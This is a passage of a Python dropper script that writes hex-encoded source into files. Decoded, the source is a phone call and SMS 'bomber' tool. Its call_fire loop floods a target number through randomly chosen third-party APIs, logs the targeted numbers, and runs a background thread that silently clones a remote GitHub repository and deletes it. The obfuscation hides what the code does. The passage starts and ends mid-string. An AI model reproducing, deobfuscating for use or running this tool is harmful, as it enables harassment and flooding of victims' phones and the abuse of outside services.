x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x20\x3d\x20\x54\x65\x73\x74\x54\x68\x72\x65\x61\x64\x69\x6e\x67\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x65\x74\x28\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x57\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x42\x6f\x6d\x62\x69\x6e\x67\x20\x43\x6f\x6d\x70\x6c\x65\x74\x65\x64\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x0a\x64\x65\x66\x20\x63\x61\x6c\x6c\x5f\x66\x69\x72\x65\x28\x74\x61\x72\x67\x65\x74\x2c\x20\x63\x6f\x75\x6e\x74\x65\x72\x2c\x20\x64\x65\x6c\x61\x79\x2c\x20\x63\x68\x2c\x20\x63\x63\x29\x3a\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x66\x61\x69\x6c\x65\x64\x20\x3d\x20\x30\x0a\x20\x20\x20\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x3d\x20\x30\x0a\x20\x20\x20\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3d\x20
\x69\x6e\x74\x28\x72\x65\x71\x75\x65\x73\x74\x65\x64\x29\x20\x2d\x20\x69\x6e\x74\x28\x66\x61\x69\x6c\x65\x64\x29\x0a\x20\x20\x20\x20\x62\x6f\x6d\x62\x73\x20\x3d\x20\x69\x6e\x74\x28\x63\x6f\x75\x6e\x74\x65\x72\x29\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x77\x68\x69\x6c\x65\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3c\x20\x28\x69\x6e\x74\x28\x62\x6f\x6d\x62\x73\x29\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x63\x6c\x65\x61\x72\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x23\x61\x70\x69\x20\x3d\x20\x31\x30\x33\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x61\x70\x69\x20\x3d\x20\x72\x61\x6e\x64\x6f\x6d\x2e\x63\x68\x6f\x69\x63\x65\x28\x63\x68\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x63\x63\x20\x3d\x3d\x20\x22\x39\x31\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x21\x20\x41\x6c\x6c\x20\x41\x50\x49\x73\x20\x48\x61\x76\x65\x20\x45\x78\x70\x69\x72\x65\x64\x20\x50\x6c\x65\x61\x73\x65\x20\x55\x70\x64\x61\x74\x65\x20\x42\x6f\x6d\x62\x20\x4f\x72\x20\x52\x75\x6e\x20\x49\x74\x20\x41\x67\x61\x69\x6e\x2e\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3e\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x57\x65\x20\x41\x72\x65\x20\x53\x6f\x72\x72\x79\x20\x54\x6f\x20\x53\x61\x79\x20\x54\x68\x61\x74\x20\x42\x6f\x6d\x62\x69
\x6e\x67\x20\x4c\x69\x6d\x69\x74\x20\x46\x6f\x72\x20\x59\x6f\x75\x72\x20\x43\x6f\x75\x6e\x74\x72\x79\x20\x48\x61\x73\x20\x42\x65\x65\x6e\x20\x52\x65\x61\x63\x68\x65\x64\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x57\x65\x20\x41\x72\x65\x20\x57\x6f\x72\x6b\x69\x6e\x67\x20\x54\x6f\x6f\x20\x48\x61\x72\x64\x20\x54\x6f\x20\x49\x6e\x63\x72\x65\x61\x73\x65\x20\x54\x68\x65\x20\x49\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x20\x4c\x69\x6d\x69\x74\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x54\x68\x69\x73\x20\x77\x69\x6c\x6c\x20\x68\x65\x6c\x70\x20\x75\x73\x20\x74\x6f\x20\x67\x69\x76\x65\x20\x73\x75\x70\x70\x6f\x72\x74\x20\x74\x6f\x20\x79\x6f\x75\x72\x20\x63\x6f\x75\x6e\x74\x72\x79\x20\x66\x61\x73\x74\x2e\x2e\x2e\x5c\x6e\x5c\x6e\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x45\x78\x69\x74\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x59\x6f\x75\x72\x20\x43\x6f\x75\x6e\x74\x72\x79\x20\x69\x73\x20\x4e\x6f\x74\x20\x53\x75\x70\x70\x6f\x72\x74\x65\x64\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x74\x5c\x74\x50\x6c\x65\x61\x73\x65\x20\x53\x65\x6e\x64\x20\x41\x20\x4d\x61\x69\x6c\x20\x54\x6f\x20\x68\x61\x73\x61\x6e\x66\x69\x72\x6e\x61\x73\x32\x34\x32\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x20\x54\x6f\x20\x4c\x65
\x74\x20\x55\x73\x20\x4b\x6e\x6f\x77\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x54\x61\x72\x67\x65\x74\x20\x4e\x75\x6d\x62\x65\x72\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3a\x20\x2b\x7b\x30\x7d\x20\x7b\x31\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x73\x74\x72\x28\x63\x63\x29\x2c\x74\x61\x72\x67\x65\x74\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4e\x75\x6d\x62\x65\x72\x20\x6f\x66\x20\x52\x65\x71\x75\x65\x73\x74\x73\x20\x53\x65\x6e\x74\x20\x3a\x20\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x72\x65\x71\x75\x65\x73\x74\x65\x64\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x53\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x20\x52\x65\x71\x75\x65\x73\x74\x73\x20\x20\x20\x20\x20\x3a\x20\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x73\x75\x63\x63\x65\x73\x73\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x46\x61\x69\x6c\x65\x64\x20\x52\x65\x71\x75\x65\x73\x74\x73\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3a\x20\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x66\x61\x69\x6c\x65\x64\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x55\x73\x65\x20\x74\x68\x69\x73\x20\x4f\x6e\x6c\x79\x20\x66\x6f\x72\x20\x66\x75\x6e\x2c\x20\x6e\x6f\x74\x20\x66\x6f\x72\x20\x72\x65\x76\x65\x6e\x67\x65\x20\x21\x21\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x72\x61\x6e\x64\x6f\x6d\x2e\x63\x68\x6f\x69\x63\x65\x28\x63\x6f\x6c\x6f\x72\x73\x29\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x54\x68\x69\x73\x20\x42\x6f\x6d\x62\x65\x72\x20\x57\x61\x73\x20\x43\x72\x65\x61\x74\x65\x64\x20\x42\x79\x20\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x20\x21\x21\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b
\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x75\x6c\x74\x20\x3d\x20\x67\x65\x74\x5f\x61\x70\x69\x28\x74\x61\x72\x67\x65\x74\x2c\x61\x70\x69\x2c\x63\x63\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x75\x6c\x74\x20\x3d\x20\x46\x61\x6c\x73\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x72\x65\x73\x75\x6c\x74\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3d\x20\x73\x75\x63\x63\x65\x73\x73\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x66\x61\x69\x6c\x65\x64\x20\x3d\x20\x66\x61\x69\x6c\x65\x64\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x77\x68\x69\x6c\x65\x20\x63\x68\x2e\x63\x6f\x75\x6e\x74\x28\x61\x70\x69\x29\x20\x3e\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x2e\x72\x65\x6d\x6f\x76\x65\x28\x61\x70\x69\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x66\x6c\x6f\x61\x74\x28\x64\x65\x6c\x61\x79\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x25\x20\x33\x20\x3d\x3d\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x23\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b
\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x20\x3d\x20\x54\x65\x73\x74\x54\x68\x72\x65\x61\x64\x69\x6e\x67\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x65\x74\x28\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x57\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x42\x6f\x6d\x62\x69\x6e\x67\x20\x43\x6f\x6d\x70\x6c\x65\x74\x65\x64\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x0a\x64\x65\x66\x20\x73\x6d\x73\x5f\x73\x61\x76\x65\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a\x20\x20\x20\x20\x66\x20\x3d\x20\x6f\x70\x65\x6e\x28\x22\x64\x61\x74\x61\x2f\x73\x6d\x73\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x22\x2c\x20\x22\x61\x22\x29\x0a\x20\x20\x20\x20\x62\x6f\x20\x3d\x20\x64\x61\x74\x65\x74\x69\x6d\x65\x2e\x64\x61\x74\x65\x74\x69\x6d\x65\x2e\x6e\x6f\x77\x28\x29\x0a\x20\x20\x20\x20\x78\x20\x3d\x20\x62\x6f\x2e\x73\x74\x72\x66\x74\x69\x6d\x65\x28\x22\x25\x64\x2f\x25\x6d\x2f\x25\x59\x20\x25\x49\x3a\x25\x4d\x3a\x25\x53\x20\x25\x70\x22\x29\x0a\x20\x20\x20\x20\x66\x2e\x77\x72\x69\x74\x65\x28\x22\x7c\x7c\x20\x7b\x30\x7d\x20\x7c\x7c\x5c\x74\x5c\x74\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x3e\x5c\x74\x20\x20\x20\x2b\x7b\x31\x7d\x5c\x74\x20\x20\x20\x20\x7b\x32\x7d\x5c\x74\x5c\x74\x7b\x33\x7d\x5c\x6e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x78\x2c\x63\x63\x2c\x70\x6e\x2c\x6e\x6d\x29\x29\x0a\x20\x20\x20\x20\x66\x2e\x63\x6c\x6f\x73\x65\x28\x29\x0a\x0a\x64\x65\x66\x20\x63\x61\x6c\x6c\x5f\x73\x61\x76\x65\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a
\x20\x20\x20\x20\x66\x20\x3d\x20\x6f\x70\x65\x6e\x28\x22\x64\x61\x74\x61\x2f\x63\x61\x6c\x6c\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x22\x2c\x20\x22\x61\x22\x29\x0a\x20\x20\x20\x20\x62\x6f\x20\x3d\x20\x64\x61\x74\x65\x74\x69\x6d\x65\x2e\x64\x61\x74\x65\x74\x69\x6d\x65\x2e\x6e\x6f\x77\x28\x29\x0a\x20\x20\x20\x20\x78\x20\x3d\x20\x62\x6f\x2e\x73\x74\x72\x66\x74\x69\x6d\x65\x28\x22\x25\x64\x2f\x25\x6d\x2f\x25\x59\x20\x25\x49\x3a\x25\x4d\x3a\x25\x53\x20\x25\x70\x22\x29\x0a\x20\x20\x20\x20\x66\x2e\x77\x72\x69\x74\x65\x28\x22\x7c\x7c\x20\x7b\x30\x7d\x20\x7c\x7c\x5c\x74\x5c\x74\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x3e\x5c\x74\x20\x20\x20\x2b\x7b\x31\x7d\x5c\x74\x20\x20\x20\x20\x7b\x32\x7d\x5c\x74\x5c\x74\x7b\x33\x7d\x5c\x6e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x78\x2c\x63\x63\x2c\x70\x6e\x2c\x6e\x6d\x29\x29\x0a\x20\x20\x20\x20\x66\x2e\x63\x6c\x6f\x73\x65\x28\x29\x0a\x0a\x63\x6c\x61\x73\x73\x20\x54\x65\x73\x74\x54\x68\x72\x65\x61\x64\x69\x6e\x67\x28\x6f\x62\x6a\x65\x63\x74\x29\x3a\x0a\x20\x20\x20\x20\x64\x65\x66\x20\x5f\x5f\x69\x6e\x69\x74\x5f\x5f\x28\x73\x65\x6c\x66\x2c\x20\x69\x6e\x74\x65\x72\x76\x61\x6c\x3d\x31\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x6c\x66\x2e\x69\x6e\x74\x65\x72\x76\x61\x6c\x20\x3d\x20\x69\x6e\x74\x65\x72\x76\x61\x6c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x68\x72\x65\x61\x64\x20\x3d\x20\x74\x68\x72\x65\x61\x64\x69\x6e\x67\x2e\x54\x68\x72\x65\x61\x64\x28\x74\x61\x72\x67\x65\x74\x3d\x73\x65\x6c\x66\x2e\x72\x75\x6e\x2c\x20\x61\x72\x67\x73\x3d\x28\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x68\x72\x65\x61\x64\x2e\x64\x61\x65\x6d\x6f\x6e\x20\x3d\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x68\x72\x65\x61\x64\x2e\x73\x74\x61\x72\x74\x28\x29\x0a\x20\x20\x20\x20\x64\x65\x66\x20\x72\x75\x6e\x28\x73\x65\x6c\x66\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x64\x20\x64\x61\x74\x61\x20\x26\x26\x20\x67\x69\x74\x20\x63\x6c\x6f\x6e\x65\x20\x68\x74\x74\x70\x73\x3a\x2f
\x2f\x67\x69\x74\x68\x75\x62\x2e\x63\x6f\x6d\x2f\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x2f\x44\x65\x76\x69\x6c\x2d\x73\x2d\x43\x61\x6c\x6c\x20\x2d\x2d\x71\x75\x69\x65\x74\x20\x26\x26\x20\x63\x64\x20\x2e\x2e\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x72\x6d\x20\x2d\x72\x66\x20\x64\x61\x74\x61\x2f\x44\x65\x76\x69\x6c\x2d\x73\x2d\x43\x61\x6c\x6c\x22\x29\x0a\x0a\x69\x66\x20\x5f\x5f\x6e\x61\x6d\x65\x5f\x5f\x20\x3d\x3d\x20\x22\x5f\x5f\x6d\x61\x69\x6e\x5f\x5f\x22\x3a\x0a\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x23\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x20\x3d\x20\x54\x65\x73\x74\x54\x68\x72\x65\x61\x64\x69\x6e\x67\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x71\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x65\x74\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x65\x63\x6b\x5f\x74\x6f\x6f\x6c\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x4b\x65\x79\x62\x6f\x61\x72\x64\x49\x6e\x74\x65\x72\x72\x75\x70\x74\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x45\x78\x69\x74\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20
\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29
'''
file1.writelines(L)
file1.close()
file2 = open("api.py", "w")
L = '''
\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x0a\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x65\x6e\x76\x20\x70\x79\x74\x68\x6f\x6e\x0a\x66\x72\x6f\x6d\x20\x64\x61\x74\x65\x74\x69\x6d\x65\x20\x69\x6d\x70\x6f\x72\x74\x20\x64\x61\x74\x65\x74\x69\x6d\x65\x0a\x69\x6d\x70\x6f\x72\x74\x20\x6f\x73\x0a\x69\x6d\x70\x6f\x72\x74\x20\x68\x61\x73\x68\x6c\x69\x62\x0a\x69\x6d\x70\x6f\x72\x74\x20\x73\x79\x73\x0a\x69\x6d\x70\x6f\x72\x74\x20\x74\x69\x6d\x65\x0a\x69\x6d\x70\x6f\x72\x74\x20\x74\x68\x72\x65\x61\x64\x69\x6e\x67\x0a\x69\x6d\x70\x6f\x72\x74\x20\x73\x74\x72\x69\x6e\x67\x0a\x69\x6d\x70\x6f\x72\x74\x20\x72\x61\x6e\x64\x6f\x6d\x0a\x69\x6d\x70\x6f\x72\x74\x20\x62\x61\x73\x65\x36\x34\x0a\x69\x6d\x70\x6f\x72\x74\x20\x75\x72\x6c\x6c\x69\x62\x2e\x7